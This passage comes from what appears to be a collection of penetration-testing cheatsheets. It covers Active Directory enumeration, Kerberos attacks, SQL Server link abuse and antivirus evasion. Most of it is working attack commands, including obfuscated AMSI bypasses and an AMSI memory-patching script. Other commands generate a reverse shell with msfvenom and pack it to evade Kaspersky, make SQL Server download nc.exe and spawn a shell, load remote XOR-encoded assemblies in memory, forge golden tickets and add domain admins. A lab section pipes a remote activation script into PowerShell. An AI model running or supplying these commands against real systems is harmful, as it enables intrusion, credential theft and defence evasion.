enum4linux -P -o 92 | 93 | (Get-DomainPolicy);"kerberos policy" 94 | ``` 95 | 96 | ### Computers enumeration 97 | 98 | Find DC IP 99 | 100 | ```bash 101 | cat /etc/resolv.conf 102 | 103 | nslookup 104 | 105 | $Searcher = New-Object DirectoryServices.DirectorySearcher ; $Searcher.Filter = "(&(objectclass=user))" ; $Searcher.SearchRoot = '' ; $Searcher.FindAll() 106 | 107 | Get-NetDomainController 108 | ``` 109 | 110 | Domain computers 111 | 112 | - [adidnsdump](https://github.com/dirkjanm/adidnsdump) 113 | - [SharpSniper](https://github.com/HunnicCyber/SharpSniper) 114 | 115 | ```bash 116 | netdom query SERVER 117 | 118 | Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,ipv4Address | Export-CSV ADcomputerslist.csv -NoTypeInformation -Encoding UTF8 119 | 120 | #pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump 121 | adidnsdump -u \\ -p 122 | adidnsdump -u \\ -p --forest --include-tombstoned 123 | adidnsdump -u \\ -p --dns-tcp 124 | 125 | # Find specific computer of domain user 126 | SharpSniper.exe emusk 127 | 128 | # Find computer where current user is local admin 129 | Find-WMILocalAdminAccess 130 | 131 | # Find computer where current can get a shell 132 | Get-NetComputer -Unconstrained 133 | 134 | # One-line powershell reverse lookup 135 | for ($i=1; $i -le 254; $i++) { $a=Get-Random -Maximum 4; echo "10.11.12.$i" $ErrorActionPreference = "SilentlyContinue"; [System.Net.DNS]::GetHostbyAddress("10.11.12.$i").HostName; $ErrorActionPreference = "Continue"; sleep $a } 136 | ``` 137 | 138 | ### Shares enumeration 139 | 140 | Look for anonymous SMB, NFS, FTP, etc 141 | 142 | **SMB readable shares** 143 | 144 | ```bash 145 | # ManSpider 146 | git clone https://github.com/blacklanternsecurity/MANSPIDER && cd MANSPIDER && pipenv --python 3 shell 147 | pip install -r requirements.txt 148 | ./manspider.py -d -u -p -f passw user admin account network login logon cred 149 | ./manspider.py -d -u -p -c password -e xlsx 150 | ./manspider.py -d -u -p -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config 151 | 152 | # smbmap 153 | smbmap -H IP -r DOSSIER 154 | smbmap -H IP --download DOSSIER 155 | smbmap -P 445 -H -u '' -p '' 156 | smbmap --host-file smb-hosts.txt -u '' -p '' -q -R --depth 3 --exclude ADMIN$ IPC$ -A '(web|server|global|index|login|logout|auth|httpd|config).(xml|config|conf|asax|aspx|php|asp|jsp|html)' 157 | 158 | # smbget & smbclient 159 | smbget -rR smb://// -U 160 | smbclient \\\\\\c$ -U 161 | smbclient -L // -U '\' 162 | 163 | # SMB V1 164 | smbclient -L ///192.168.0.1 -U -c ls [--option='client min protocol=NT1'] 165 | mount //10.11.1.136/"Bob Share" /mnt/bob [-o vers=1.0] 166 | 167 | # wireshark filter to find SMB version 168 | smb.native_lanman 169 | ``` 170 | 171 | **SMB writable shares** 172 | 173 | upload this @scf_filename.scf and listen for hashs using Responder/NTLMrelayx 174 | 175 | > add a @ at first letter of the filename will place the .scf file on the top of the shared folder 176 | 177 | ```bash 178 | [Shell] 179 | Command=2 180 | IconFile=\\\share\.ico 181 | [Taskbar] 182 | Command=ToggleDesktop 183 | ``` 184 | 185 | 186 | **NFS** 187 | 188 | ```bash 189 | showmount -e 190 | mount :/home/xx /mnt/yy 191 | ``` 192 | 193 | ### Forest enumeration 194 | 195 | ```bash 196 | ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() 197 | 198 | Get-NetForest 199 | Get-NetForestCatalog 200 | Get-NetForestTrust 201 | ``` 202 | 203 | --- 204 | 205 | ## **ACLs** 206 | 207 | 208 | ### GenericAll on user "alfred" from "jenaye" (Bloodhound) 209 | 210 | its possible to use certipy like this `certipy shadow auto -username jenaye@ -p 'AAAAA' -account alfred` to get hash of user alfred, but, you also can do it manualy : 211 | 212 | `proxychains python3 pywhisker.py -d -u jenaye -p 'AAAAA' --target alfred --action "add" --dc-ip --filename alfred.pfx` 213 | 214 | then 215 | 216 | `proxychains python3 gettgtpkinit.py -cert-pfx "alfred.pfx" -pfx-pass "" "/alfred" "alfred.ccache"` 217 | 218 | and get nt hash of alfred : 219 | 220 | `KRB5CCNAME=alfred.ccache proxychains python3 getnthash.py /alfred -key 221 | ` 222 | 223 | > Its also possible to do this on machine acccount ( --target 'ComputerXXX$') 224 | 225 | 226 | ### ACLPwn 227 | 228 | - [aclpwn.py](https://github.com/fox-it/aclpwn.py) 229 | - [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) 230 | 231 | 232 | ```bash 233 | # pip install aclpwn 234 | python aclpwn.py -f -ft user -d -dry 235 | python aclpwn.py -f -ft computer -d -dry 236 | python aclpwn.py -f -ft user -d 237 | python aclpwn.py -f -ft user -d --restore aclpwn-20181129-182321.restore 238 | 239 | # Powershell 240 | ./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -NoDCSync 241 | ./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe 242 | ./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -userAccountToPwn 'Administrator' 243 | ./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -LogToFile 244 | ./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -NoSecCleanup 245 | ./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username -Domain -Password 246 | ``` 247 | 248 | ### Manual Exploit DCSync 249 | 250 | ```bash 251 | # Get ACL 252 | Get-DomainObjectAcl -Identity -ResolveGUIDs ? { $_.SecurityIdentifier -Match $(ConvertTo-SID ) } 253 | 254 | # Add DCSync 255 | Add-DomainObjectAcl -TargetIdentity "DC=,DC=" -PrincipalIdentity -Rights DCSync 256 | 257 | # Dump ntds 258 | meterpreter > dcsync_ntlm \ 259 | ``` 260 | 261 | --- 262 | 263 | ## **Kerberos Tokens** 264 | 265 | ### Tools 266 | 267 | - [Rubeus.exe](https://github.com/GhostPack/Rubeus) (DOTNET CSHARP) 268 | - [Tokenvator](https://github.com/0xbadjuju/Tokenvator) (DOTNET CSHARP) 269 | - [Incognito.exe](https://github.com/FSecureLABS/incognito) (Meterpreter extension) 270 | - [TokenManipulation.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/c7985c9bc31e92bb6243c177d7d1d7e68b6f1816/Exfiltration/Invoke-TokenManipulation.ps1) 271 | - [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) 272 | 273 | Reflectively load DOTNET CSHARP Assembly within Powershell (or Cobalt, SilentTrinity etc.) if you cant do it through your C2 Infra : 274 | 275 | ```powershell 276 | $wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials 277 | $k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))|%{$_-bxor$k[$i++%$k.length]} 278 | [System.Reflection.Assembly]::Load($b) | Out-Null 279 | $parameters=@("arg1", "arg2") 280 | [namespace.Class]::Main($parameters) 281 | ``` 282 | 283 | ### Kerberos Dump 284 | 285 | ```bash 286 | # List SPN 287 | impacket GetUserSPNs.ps1 288 | 289 | # Create new service ticket into memory 290 | Add-Type -AssemblyName System.IdentityModel 291 | New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SSQLSvc/xor-app23.xor.com:1433" 292 | 293 | # Mimikatz 294 | .\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit 295 | Invoke-Mimikatz -Command '"kereberos::list /export"' 296 | 297 | # Rubeus 298 | Rubeus.exe klist 299 | Rubeus.exe dump 300 | Rubeus.exe monitor /interval:5 /nowrap ; MS-RPRN.exe \\ \\ ; Rubeus.exe ptt /ticket: ; Invoke-Mimikatz -Command '"lsadump::dcsync /user:\krbtgt"' ; enter-pssessions -computername 301 | ``` 302 | 303 | --- 304 | 305 | ### Kerberos pre-auth 306 | 307 | ```bash 308 | Rubeus.exe asreproast /outfile:asrep_hashes.txt 309 | 310 | nmap -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='',userdb=/root/users.txt 311 | 312 | ./kerbrute_linux_amd64 userenum -d usernames.txt -debug 313 | 314 | impacket-GetNPUsers -usersfile kerb_users.txt / -dc-ip 315 | ``` 316 | 317 | --- 318 | 319 | ### Kerberoast attack 320 | 321 | ```bash 322 | Rubeus.exe kerberoast /outfile:roasted_hashes.txt 323 | ``` 324 | 325 | --- 326 | 327 | ### Kerberos impersonate 328 | 329 | Find domain admin accounts 330 | 331 | ```bash 332 | net group "Domain Admins" /DOMAIN 333 | 334 | Get-NetGroupMember -GroupName "Domain Admins" -Recurse 335 | ``` 336 | 337 | Find if one is loggedon somewhere : 338 | 339 | ```bash 340 | crackmapexec smb -u -d -H --loggedon-users 341 | bloodhound-python -d -p -dc -c LoggedOn 342 | ``` 343 | 344 | Impersonate kerberos token 345 | 346 | ```bash 347 | # Rubeus 348 | Rubeus.exe s4u 349 | 350 | # TokenManipulation 351 | Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" 352 | Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" 353 | 354 | # Incognito loaded by Meterpreter 355 | load incognito 356 | list_tokens -u 357 | impersonate_token \\ # Double slash is mandatory ! 358 | 359 | # Incognito standalone executable 360 | Incognito.exe 361 | 362 | # CrackMapExec using kerberos ticket 363 | export KRB5CCNAME=.ccache 364 | sudo cme smb --kerberos -x whoami 365 | ``` 366 | 367 | Check if a computer has the TrustedForDelegation flag enabled 368 | 369 | ```bash 370 | Get-ADComputer -Identity -Properties TrustedForDelegation 371 | ``` 372 | 373 | Create new Domain Admin account 374 | 375 | ```bash 376 | net user add /domain 377 | net group "Domain Admins" /add 378 | ``` 379 | 380 | ### Golden Ticket 381 | 382 | ```bash 383 | Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid: /sids: /krbtgt: /ticket:krbtgt.kirbi"' 384 | Invoke-Mimikatz -Command '"kerberos::ptt krbtgt.kirbi"' 385 | ls \\\C$ 386 | 387 | Invoke-Mimikatz -Command '"lsadump::lsa /patch"' 388 | Invoke-Mimikatz -Command '"lsadump::dcsyn /domain: /all"' 389 | Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid:S-1-5-21-77175520-687805270-358672322 /sids:S-1-5-21-1458491649-1432147247-1990877046-519 /krbtgt:1ee3a9c4a96c4450878eaa8cb45b29fb /ptt"' 390 | gwmi -class win32_operatingsystem -ComputerName 391 | ``` 392 | 393 | 394 | --- 395 | 396 | ### Manual testing 397 | 398 | - [secureauth.com](https://www.secureauth.com/blog/kerberos-delegation-spns-and-more/) 399 | 400 | ### Delegation Explained 401 | 402 | - [specterops.io](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) 403 | 404 | ## **SQL exploit** 405 | 406 | Trusted Links (pwn even across forests trusts) 407 | 408 | ```bash 409 | .\PowerUpSQL.ps1 410 | Get-SQLInstanceLocal 411 | Get-SQLInstanceDomain 412 | Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose 413 | Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded 414 | 415 | Get-SQLServerLink -Verbose -Instance 416 | Get-SQLServerLinkCrawl -Verbose -Instance 417 | Get-SQLServerLinkCrawl -Verbose -Instance -Query 'exec master..xp_cmdshell "whoami"' 418 | Get-SQLServerLinkCrawl -verbose -Instance -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT ""' 419 | Get-SQLServerLinkCrawl -Instance -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadFile(''http:///nc.exe'',''C:\Windows\Temp\nc.exe'')"' ; Get-SQLServerLinkCrawl -Instance -Query 'exec master..xp_cmdshell "C:\Windows\Temp\nc.exe -e cmd 1234"' 420 | 421 | Invoke-SQLEscalatePriv -Verbose -Instance "SQLServer1\Instance1" 422 | 423 | Invoke-SQLAudit -Verbose -Instance 424 | 425 | SELECT IS_SRVROLEMEMBER ('sysadmin') , IS_MEMBER ('db_owner'), USER_NAME() 426 | exec master.dbo.xp_dirtree '\\\\xpdirtree_exploit' 427 | SELECT IS_SRVROLEMEMBER ('sysadmin') , IS_MEMBER ('db_owner'), USER_NAME() 428 | 429 | EXECUTE AS USER='dbo' 430 | ALTER SERVER ROLE [sysadmin] 431 | ADD MEMBER [] 432 | EXEC sp_configure 'show advanced options',1 433 | 434 | EXEC sp_configure 'xp_cmdshell',1 435 | EXEC master..xp_cmdshell 'whoami' 436 | 437 | #Create user and give admin privileges 438 | EXECUTE('EXECUTE(''CREATE LOGIN WITH PASSWORD = '''''''' '') AT "\"') AT "\" 439 | EXECUTE('EXECUTE(''sp_addsrvrolemember '''''''' , ''''sysadmin'''' '') AT "\"') AT "\" 440 | 441 | # Remediation 442 | REVOKE Execute ON xp_dirtree FROM PUBLIC 443 | ``` 444 | 445 | 446 | -------------------------------------------------------------------------------- /Cheatsheets/internal/09-antivirus-bypass.md: -------------------------------------------------------------------------------- 1 | # AV Bypass 2 | 3 | ## Practical 4 | 5 | ### C2 6 | 7 | - [Covenant](https://github.com/cobbr/Covenant) 8 | - [Cobalt Strike](https://www.cobaltstrike.com/) 9 | - Metasploit (Without meterpreter ^^) 10 | 11 | ### Packer 12 | - [PEzor](https://github.com/phra/PEzor) 13 | - [ScareCrow](https://github.com/optiv/ScareCrow) 14 | 15 | ### Memory injection 16 | - [SharpBlock](https://github.com/CCob/SharpBlock) 17 | - inject shellcode directly into memory 18 | - bypass ETW and Process Hollowing detection 19 | - Bypass specific AV and ERD dll 20 | 21 | ### Not distributed to online AV 22 | - [antiscan.me](https://antiscan.me) 23 | - [nodistribute](https://nodistribute.com/) 24 | 25 | ### AMSI Bypass 26 | 27 | one line 28 | 29 | ```sh 30 | sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) 31 | 32 | set-item('V'+'aR'+'IA'+'blE:1q2'+'uZx')([TYpE]("{1}{0}"-F'F','rE'));(GeT-VariaBle("1Q2U"+"zX")-VaL)."A`ss`Embly"."GET`TY`Pe"(("{6}{3}{1}{4}{2}{0}{5}"-f'Util','A','Amsi','.Management.','utomation.','s','System'))."g`etf`iElD"(("{0}{2}{1}"-f'amsi','d','InitFaile'),("{2}{4}{0}{1}{3}"-f'Stat','i','NonPubli','c','c,'))."sE`T`VaLUE"(${n`ULl},${t`RuE}) 33 | 34 | $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) 35 | ``` 36 | 37 | script (can be copied pasted directly into powershell console) 38 | 39 | ```bash 40 | function LookupFunc { 41 | Param ($moduleName, $functionName) 42 | 43 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 44 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1]. 45 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 46 | $tmp=@() 47 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} 48 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName)) 49 | } 50 | 51 | function getDelegateType { 52 | Param ( 53 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func, [Parameter(Position = 1)] [Type] $delType = [Void] 54 | ) 55 | $type = [AppDomain]::CurrentDomain. 56 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). 57 | DefineDynamicModule('InMemoryModule', $false). 58 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) 59 | $type. 60 | DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func). 61 | SetImplementationFlags('Runtime, Managed') 62 | $type. 63 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func). 64 | SetImplementationFlags('Runtime, Managed') 65 | 66 | return $type.CreateType() 67 | } 68 | [IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession 69 | $oldProtectionBuffer = 0 70 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool]))) 71 | $vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer) 72 | 73 | $buf = [Byte[]] (0x48, 0x31, 0xC0) 74 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3) 75 | $vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer) 76 | ``` 77 | 78 | ### Applocker whitelist bypass 79 | 80 | - LOLBAS 81 | - Copy binary to trusted folders 82 | - dll acceschk c:/windows 83 | 84 | ```bash 85 | type js.js > "C:\.log:js.js" 86 | dir /r ".log 87 | wscript "C:\.log:js.js" 88 | ``` 89 | 90 | - Alternate Data Stream 91 | 92 | ```bash 93 | type js.js > "C:\.log:js.js" 94 | dir /r ".log 95 | wscript "C:\.log:js.js" 96 | ``` 97 | 98 | - Third part execution 99 | 100 | Using Python, Perl, etc. 101 | 102 | 103 | ### Full PoC against Kasp 104 | 105 | Winning combo : SharpBlock + PEzor (bypass Kasp for the moment..) 106 | 107 | 1. Compile SharpBlock from source (using VStudio). It generates a file : SharpBlock.exe 108 | 2. Generate shellcode in raw format (here is an exemple for msf) : 109 | 110 | ```sh 111 | msfvenom -p windows/x64/shell_reverse_tcp LHOST= LHOST= -f raw -o .bin 112 | ``` 113 | 3. Repack shellcode 114 | ```sh 115 | ./PEzor.sh -unhook -rx -sleep=150 .bin 116 | ``` 117 | 4. Repack SharpBlock adding arguments 118 | - HTTP webserver version : 119 | ```sh 120 | ./PEzor.sh -unhook -antidebug -text -rx -sleep=150 -p '-e http:///.bin.packed.exe -s "C:\Windows\System32\SecurityHealthSystray.exe"' 121 | ``` 122 | 123 | 5. Setup your launcher (and webserver), and execute the packed binary file from the target 124 | 125 | 6. Be patient (around 5min depending on the sleep argument set), get your shell and enjoy :) 126 | 127 | --- 128 | 129 | ### Offline testing 130 | 131 | For testing using a Windows VM connecting to an offline C2 : 132 | 1. Create a Windows VM and install the target AV. 133 | 2. Create a Linux VM and install a C2. 134 | 3. Set up the network interface to Host-Only for all VMs (Target(s) and C2). 135 | 4. Test your payloads and enjoy your shells :) 136 | > You may want to use snapshots and/or linked clones after your infrastructure is ready so that you can trash your Windows VM after each test and pop a new one. 137 | 138 | --- 139 | 140 | ### Online testing 141 | 142 | For testing using a Windows VM connecting to an online C2 : 143 | 144 | #### Context 145 | 146 | - Restrict Windows VM network 147 | - No trust in the Windows VM firewall 148 | - No need to alter the host firewall 149 | 150 | To restrict the Windows VM traffic to the C2 server only (we don't want our payloads to get sent to the AV cloud), we will create a new Linux VM and use is as a router/firewall. 151 | 152 | #### Setup 153 | 154 | 1. Create a Windows VM and install the target AV. 155 | 2. Set up the network interface to Host-Only. 156 | 3. Create a Linux VM with 2 network interfaces (NAT and Host-only). 157 | 4. Enable ip forwarding : `echo "net.ipv4.forwarding=1">>/etc/sysctl.conf` 158 | 5. Setup the firewall as following : 159 | ``` 160 | #!/bin/bash 161 | WANIF=enp0s3 162 | LANIF=enp0s8 163 | # IPs to allow 164 | IP_ALLOWED= 165 | echo "flushing iptables..." 166 | sudo iptables -F 167 | sudo iptables -X 168 | sudo iptables -t nat -F 169 | sudo iptables -t nat -X 170 | sudo iptables -t mangle -F 171 | sudo iptables -t mangle -X 172 | # allow ssh on vm 173 | sudo iptables -A INPUT -i $LANIF -p tcp --dport 22 -j ACCEPT 174 | # masquerade 175 | sudo iptables -A POSTROUTING -t nat -o $WANIF -j MASQUERADE 176 | sudo iptables -A FORWARD -i $WANIF -m state --state ESTABLISHED,RELATED -j ACCEPT 177 | # Allow ping on target 178 | sudo iptables -A FORWARD -i $LANIF -p icmp -d $IP_ALLOWED -j ACCEPT 179 | # Allow on target 180 | sudo iptables -A FORWARD -i $LANIF -p tcp --dport -d $IP_ALLOWED -j ACCEPT 181 | # Drop the rest 182 | sudo iptables -P INPUT DROP 183 | sudo iptables -P FORWARD DROP 184 | sudo iptables -P OUTPUT DROP 185 | ``` 186 | 6. make it persistent at each restart : 187 | ```sh 188 | sudo apt install iptables-persistent && sudo iptables-save -c > /etc/iptables/rules.v4 189 | ``` 190 | 7. Configure the Windows VM (Host-Only network interface) to use the linux VM as his gateway (set static IP address). 191 | 8. For DNS you can add the association into the file : `C:\Windows\System32\drivers\etc\hosts` 192 | 9. Test your payloads and enjoy your shells ! 193 | 194 | --- 195 | 196 | ### Automated testing 197 | 198 | CI Pipeline 199 | 200 | **todo** 201 | 202 | --- 203 | 204 | ### VisualStudio compiler 205 | 206 | Compiler location 207 | 208 | ```bat 209 | C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.28.29333\bin\Hostx64\x64\Src 210 | ``` 211 | 212 | --- 213 | 214 | ### Fix Pezor 215 | 216 | Fixed by author. check : [Inline syscall old version](https://github.com/phra/PEzor/commit/531095695f56b7ab3add7c9c154ebce830e534a7) 217 | 218 | 219 | --- 220 | 221 | ### Vrac commands 222 | 223 | ```sh 224 | for i in `cat /tmp/default_users_for_services_unhash.txt` ; do /opt/vpn_connect -u $i -p a -l /tmp/$i;done 225 | 226 | copy \\192.168.56.200\tiki\processinjectionn.zip C:\Users\wee\ 227 | copy C:\Users\wee\processinjectionn\ProcessInjection\ProcessInjection\bin\Debug\ProcessInjection.exe \\192.168.56.200\tiki\ 228 | 229 | ProcessInjection.exe.packed.exe /f:raw /url:http://192.168.56.200:9000/procinj /ppath:C:\program files\internet explorer\iexplore.exe /pid:7368 /t:4 230 | ProcessInjection.exe /f:raw /url:http://192.168.56.200:9000/procinj /ppath:C:\program files\internet explorer\iexplore.exe /pid:7368 /t:4 231 | ProcessInjection.exe /f:raw /url:http://192.168.56.200:9000/procinj /ppath:"C:\program files\internet explorer\iexplore.exe" /pid:4928 /t:3 232 | ProcessInjection.exe /f:raw /url:http://192.168.56.200:9000/longhaul/longhaul_beacon/beacon64.bin.sgn /ppath:"C:\program files\internet explorer\iexplore.exe" /t:3 233 | 234 | cd "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.28.29333\bin\Hostx64\x64>" 235 | copy Bin\wraith_x64_encoded.bin \\192.168.56.200\tiki\ 236 | 237 | ``` 238 | 239 | ### LOLBIN 240 | 241 | #### tpmtool 242 | `tpmtool.exe drivertracing stop` it will run cmd.exe who call logman.exe in the current folder 243 | 244 | #### IE 245 | 246 | By navigating to URI: `shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}` you can spawn `rstrui.exe` (System Restore). 247 | If you modify the `SystemRoot` environment variable and copy over DLLs you can run whatever you like. 248 | 249 | --- 250 | 251 | ## Theorical 252 | 253 | Every file has a score that gets involved in triggering one of the three different states (which can change during the scanning process) : 254 | 255 | - good (autorise) 256 | - bad (block and alert) 257 | - unknown (block, autorise, monitor, and/or scary prompt, depending on the AV) 258 | 259 | ### Static analysis 260 | 261 | #### 1. Rule-based 262 | Content in the binary that matchs analyst definition of known bad : 263 | 264 | - obfuscate functions and string from offense code 265 | - obfuscate base64 encoded dll or shellcode 266 | - change decryption key 267 | - dynamic resolv GetProcAddress, GetModuleGandler 268 | 269 | #### 2. Heuristics 270 | Properties of the binary to find suspicious things : 271 | 272 | - compile time 273 | - compiler (Windows => good or Linux => not good for WinDef) 274 | - import table 275 | - metadata resources (name, icon, absence of this) 276 | - signed or not 277 | - entropy 278 | - take metadata from existing program 279 | - import table shellcode injection 280 | 281 | #### 3. Correlation 282 | - append known good program to get good score 283 | - reduce entropy (not all packed) 284 | 285 | --- 286 | 287 | ### Dynamic analysis 288 | 289 | #### 1. Local Sandbox : emulated memory (~ 3sec) 290 | - short time (3sec only) 291 | - incomplete emulation (CPU only) 292 | 293 | #### 2. Cloud VM (~ 1min) 294 | - cheks metadata (sha256 or any ioc from previous analysis) 295 | - more complete emulation 296 | 297 | --- 298 | 299 | ### IN memory detection evasion 300 | *payload exe => reflective dll => payload dll* 301 | 302 | Thread Start Address (DLL are memory-mapped files) 303 | 304 | - Depends on artifact or Process Injection routine that ran the payload 305 | 306 | Memory permissions 307 | 308 | - Avoid RWX permissions (RW => RX) 309 | - Avoid stagers (use stageless payloads) 310 | - Avoid module-less threads (CreateThread) 311 | - module stamping (persistence) 312 | 313 | Memory content 314 | 315 | - signs or a PE file 316 | - strings associated with toolset or common techniques 317 | - image_size, prepend, obfuscate, cleanup, strrep, sleep_mask (Cobalt) 318 | 319 | Behaviour 320 | 321 | - avoid writting a file to disk 322 | - spoof parent PID when executing a program 323 | - injecting into process (!) 324 | 325 | Process context to avoid (parent, child): 326 | 327 | - explorer.exe, notepad.exe, powershell.exe, rundll32.exe, svchost.exe 328 | - commonly abused applications 329 | - different arch (x32 or x64) 330 | 331 | Bypass sandbox detonation (VM) 332 | 333 | 1. detect sandbox 334 | 2. env keying 335 | 336 | Whitelised program : 337 | 338 | - MS Office Macro 339 | - Powershell 340 | - LOLbins 341 | - DLL SIdeloading 342 | 343 | 344 | --- 345 | 346 | ## Links 347 | 348 | [Network Sockets](https://artikrh.github.io/posts/av-evasion-network-sockets) 349 | 350 | [Cobalt Strike: Weaponization](https://www.youtube.com/watch?v=H0_CKdwbMRk) 351 | 352 | [Wraith](https://github.com/slaeryan/AQUARMOURY/tree/master/Wraith) 353 | -------------------------------------------------------------------------------- /Cheatsheets/internal/10-kerberos.md: -------------------------------------------------------------------------------- 1 | # Kerberos 2 | 3 | ## 1. **How it work** 4 | 5 | ### Reminder 6 | 7 | - The user authenticates to the kerberos server (usually the DC) 8 | 9 | - The DC sends a TGT that says "I certify that this is who he says he is". 10 | 11 | - The user requests a TGS from the service he wants with his TGT 12 | 13 | - The service checks that he has the right to access, if yes it sends him a TGS 14 | 15 | - The user uses his TGS to access the service 16 | 17 | >The TGT is signed with the NT of the krbtgt account 18 | 19 | >The TGS is signed with the NT of the machine account 20 | -------------------------------------------------------------------------------- /Cheatsheets/internal/11-wsus.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/michmich1000/Cheatsheets/6b4baa1255896e97624ad6f6d3a6a680cceb6dc1/Cheatsheets/internal/11-wsus.md -------------------------------------------------------------------------------- /Cheatsheets/lab/01-windows.md: -------------------------------------------------------------------------------- 1 | # Lab windows 2 | 3 | ## 1. **Installation** 4 | 5 | ### Download iso 6 | 7 | go to microsoft and download .iso and select windows pro (if you choose another version you will not have the RDP) 8 | 9 | 10 | ### Use Local account instead of microsoft account 11 | 12 | microsoft has hidden the installation button without internet to make it reappear and use a local account do the following actions: 13 | 14 | `shift + F10` you will have prompt and type OOBE\BYPASSNRO 15 | 16 | another way is to use the following email address: no@thankyou.com and type a random password 17 | 18 | 19 | ### Create local admin 20 | 21 | ``` 22 | net user pwn pwn /add 23 | net localgroup administrators /add 24 | ``` 25 | 26 | ### Disable UAC 27 | 28 | ``` 29 | reg.exe ADD HKLM SOFTWARE Microsoft Windows CurrentVersion Policies System / v EnableLUA / t REG_DWORD / d 0 / f . 30 | or 31 | go to HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Policies System and set EnableLUA to 0 32 | ``` 33 | 34 | 35 | ## 2. **Enable Windows** 36 | 37 | open powershell as admin and run `irm https://massgrave.dev/get | iex` 38 | 39 | 40 | ## 3. **Setup env for create payload** 41 | 42 | 43 | ### Setup env for C++ 44 | 45 | 46 | ### Setup env for .NET 47 | 48 | 49 | ## 4. **Tools to help** 50 | 51 | ### **Debugger** 52 | 53 | * [x32dbg](https://x64dbg.com/) 54 | * [x64dbg](https://x64dbg.com/) 55 | 56 | ### **Analysis** 57 | 58 | * [PE-bear](https://github.com/hasherezade/pe-bear) 59 | * [pe-sieve64](https://github.com/hasherezade/pe-sieve) 60 | * [Process hacker 2](https://processhacker.sourceforge.io/downloads.php) 61 | * [Processus Explorer](https://learn.microsoft.com/fr-fr/sysinternals/downloads/process-explorer) 62 | * [Process monitor](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon) -------------------------------------------------------------------------------- /Cheatsheets/mobile/01-ios.md: -------------------------------------------------------------------------------- 1 | # IOS Penetration Testing 2 | 3 | ## **Setup** 4 | 5 | Download : 6 | 